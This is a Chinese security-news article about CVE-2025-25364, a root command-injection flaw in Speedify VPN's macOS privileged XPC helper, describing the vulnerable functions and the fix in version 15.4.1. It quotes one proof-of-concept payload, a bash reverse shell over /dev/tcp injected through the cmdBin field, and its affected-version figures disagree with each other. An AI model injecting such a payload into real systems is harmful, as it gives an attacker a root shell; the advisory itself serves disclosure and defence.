网易首页 > 网易号 > 正文 申请入驻

【安全圈】Speedify VPN macOS 漏洞使攻击者能够提升权限

0
分享至

关键词

安全漏洞

Speedify VPN 的macOS 应用程序中发现了一个重大安全漏洞,编号为 CVE-2025-25364,该漏洞使用户面临本地权限提升和整个系统被入侵的风险。

SecureLayer7 发现的该漏洞存在于特权辅助工具 me.connectify.SMJobBlessHelper 中,该工具负责为 Speedify VPN 客户端以 root 权限执行系统级操作。该漏洞源于辅助工具的XPC(跨进程通信)接口中不正确的输入验证。

具体来说,传入的 XPC 消息中的两个用户控制字段(cmdPath 和 cmdBin)被直接用于构造命令行字符串,而没有经过充分的清理。

这个疏忽导致了命令注入漏洞,允许任何本地攻击者制作恶意 XPC 消息并注入以 root 身份执行的任意 shell 命令。

攻击链涉及几个功能:

XPC_Connection_Handler_block_invoke: XPC 消息的入口点。它检查字典类型的消息,如果“request”字段为“runSpeedify”,则调用 _handleLaunchSpeedifyMsg。cmdPath 或 cmdBin 的内容未进行验证。

_handleLaunchSpeedifyMsg:从 XPC 字典中检索 cmdPath 和 cmdBin,并将它们(未经检查)传递给下一个函数。

_RunSystemCmd:使用 asprintf 构造并执行命令字符串,直接嵌入用户提供的 cmdPath 和 cmdBin。关键代码如下:

然后使用 system() 执行该命令字符串,这使得攻击者可以轻松注入其他 shell 命令。

风险因素细节受影响的产品 适用于 macOS 的 Speedify VPN(最高版本 15.0.0) 影响 本地权限提升;以 root 身份执行任意命令。 漏洞利用前提条件 本地访问;能够将精心设计的 XPC 消息发送给辅助工具 CVSS 3.1 评分 9.8(严重)

概念验证漏洞

概念验证 (PoC) 漏洞通过向易受攻击的服务发送精心设计的 XPC 消息 证明了该问题。

通过将 cmdBin 设置为诸如“; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ”之类的有效载荷,攻击者可以生成具有 root 权限的反向 shell。该漏洞代码以 Objective-C 编写,连接到 me.connectify.SMJobBlessHelper XPC 服务并传递恶意负载,从而立即获得 root 级访问权限。

由于辅助工具作为根级守护进程

(/Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper) 运行,成功利用该漏洞意味着攻击者可以:

读取、修改或删除敏感系统文件。

安装持久性恶意软件或后门。

完全控制受影响的 macOS 设备。

因此,此漏洞对运行 Speedify VPN 易受攻击版本(15.4.1 之前版本)的任何系统都构成严重风险。

Speedify VPN在 15.4.1 版本中解决了该漏洞,其中包括对辅助工具的完全重写。

新版本消除了不安全的 XPC 处理并实现了适当的输入验证,关闭了命令注入向量。

强烈建议用户更新到最新版本,以降低被利用的风险。

安全圈

网罗圈内热点 专注网络安全

实时资讯一手掌握!

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧!

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
40元就能买假车牌?部分电商平台暗藏灰色交易!商家称“可正常上路”,律师:违法!

40元就能买假车牌?部分电商平台暗藏灰色交易!商家称“可正常上路”,律师:违法!

每日经济新闻
2026-05-18 10:32:04
签约四年,阿隆索将执教切尔西!引援锁定荷兰国门新星罗夫斯!

签约四年,阿隆索将执教切尔西!引援锁定荷兰国门新星罗夫斯!

海浪星体育
2026-05-17 09:36:55
越扒瓜越大!福建杨梅再添实锤,不只是商户投毒,还有一地更恶劣

越扒瓜越大!福建杨梅再添实锤,不只是商户投毒,还有一地更恶劣

奇思妙想草叶君
2026-05-18 14:39:22
山东大姐这事干的漂亮!被美国FBI悬赏!赏金1.5亿超过3个本拉登

山东大姐这事干的漂亮!被美国FBI悬赏!赏金1.5亿超过3个本拉登

马尔科故事会
2025-03-27 15:21:29
42岁王小玮法国发展事业巅峰,前夫王小海已销声匿迹

42岁王小玮法国发展事业巅峰,前夫王小海已销声匿迹

萧狡科普解说
2026-05-18 12:43:34
中央气象台5月18日10时发布暴雨橙色预警

中央气象台5月18日10时发布暴雨橙色预警

每日经济新闻
2026-05-18 10:35:05
马德兴:世少赛5月21日抽签,国少将以第四档身份参与

马德兴:世少赛5月21日抽签,国少将以第四档身份参与

懂球帝
2026-05-18 09:58:47
最新 | 广西柳州再次地震!现场震感强烈!

最新 | 广西柳州再次地震!现场震感强烈!

天津广播
2026-05-18 08:21:43
改口护台?特朗普返美后直接交底:绝不出兵!赖清德火速认怂后缩

改口护台?特朗普返美后直接交底:绝不出兵!赖清德火速认怂后缩

小噎论事
2026-05-18 15:51:40
绿豆有个“黄金搭档”随手一煮,清血管降血糖,立夏后喝它最合适

绿豆有个“黄金搭档”随手一煮,清血管降血糖,立夏后喝它最合适

江江食研社
2026-05-17 03:30:05
42岁王小玮现状:现身法国,事业再登巅峰,前夫王小海已销声匿迹

42岁王小玮现状:现身法国,事业再登巅峰,前夫王小海已销声匿迹

削桐作琴
2026-05-17 19:48:07
马斯克这次访华,万万没想到,居然把联想CEO杨元庆带火了!

马斯克这次访华,万万没想到,居然把联想CEO杨元庆带火了!

趣味萌宠的日常
2026-05-17 22:00:06
教育部已明确!9月起中小学取消3项服务,老师家长都松口气!

教育部已明确!9月起中小学取消3项服务,老师家长都松口气!

今朝牛马
2026-05-14 20:28:01
解放台湾,难上加难?中国解放台湾,到底存在哪些困难和阻碍?

解放台湾,难上加难?中国解放台湾,到底存在哪些困难和阻碍?

静夜史君
2026-05-11 23:59:39
5月18日 广东队最新消息 助理外教离队 黄明依续约B类 徐杰作出牺

5月18日 广东队最新消息 助理外教离队 黄明依续约B类 徐杰作出牺

晓徙娱乐
2026-05-18 10:45:24
下一个可能增长10倍的主线不是光模块,不是光纤,不是光芯片!

下一个可能增长10倍的主线不是光模块,不是光纤,不是光芯片!

林子说事
2026-05-18 14:37:28
运营商Token全国套餐来了!电信出手,个人套餐最低每月9.9元

运营商Token全国套餐来了!电信出手,个人套餐最低每月9.9元

新京报
2026-05-17 18:48:30
太寒心了!上海一老人去世后,远在国外的女儿火速赶回刚出浦东机场就打了三个电话

太寒心了!上海一老人去世后,远在国外的女儿火速赶回刚出浦东机场就打了三个电话

三农老历
2026-05-18 14:43:19
王毅:中方秋季访美,打破台独保护伞,中美达成三年互访协议

王毅:中方秋季访美,打破台独保护伞,中美达成三年互访协议

孤单是寂寞的毒
2026-05-17 12:03:21
勇士剑指冲冠!美媒爆三方交易方案:巴特勒+5首轮换马尔卡宁+萨格斯

勇士剑指冲冠!美媒爆三方交易方案:巴特勒+5首轮换马尔卡宁+萨格斯

画夕
2026-05-17 23:04:24
2026-05-18 17:47:00
安全圈
安全圈
国内首家大安全概念新媒体
6636文章数 4688关注度
往期回顾 全部

科技要闻

同一公司,有人奖金是6年工资,我却只有半年

头条要闻

5人在马尔代夫洞穴潜水时身亡 3名专家将下水寻找遗体

头条要闻

5人在马尔代夫洞穴潜水时身亡 3名专家将下水寻找遗体

体育要闻

41岁,他还想第5次踢世界杯

娱乐要闻

票房会破14亿!口碑第一电影出现了

财经要闻

前4月工业生产较快增长 失业率5.3%

汽车要闻

有五座有七座全系配四驱 哈弗猛龙PLUS限时售16.18万起

态度原创

时尚
家居
数码
公开课
军事航空

夏天裤子不用多买,提前准备几条休闲的阔腿裤,百搭舒适显瘦

家居要闻

观山隐秀 心灵沉淀

数码要闻

背板能当镜子!影驰RTX 5070星曜LUNA OC图赏

公开课

李玫瑾:为什么性格比能力更重要?

军事要闻

莫斯科遭一年多来最大规模无人机袭击 3死18伤

无障碍浏览 进入关怀版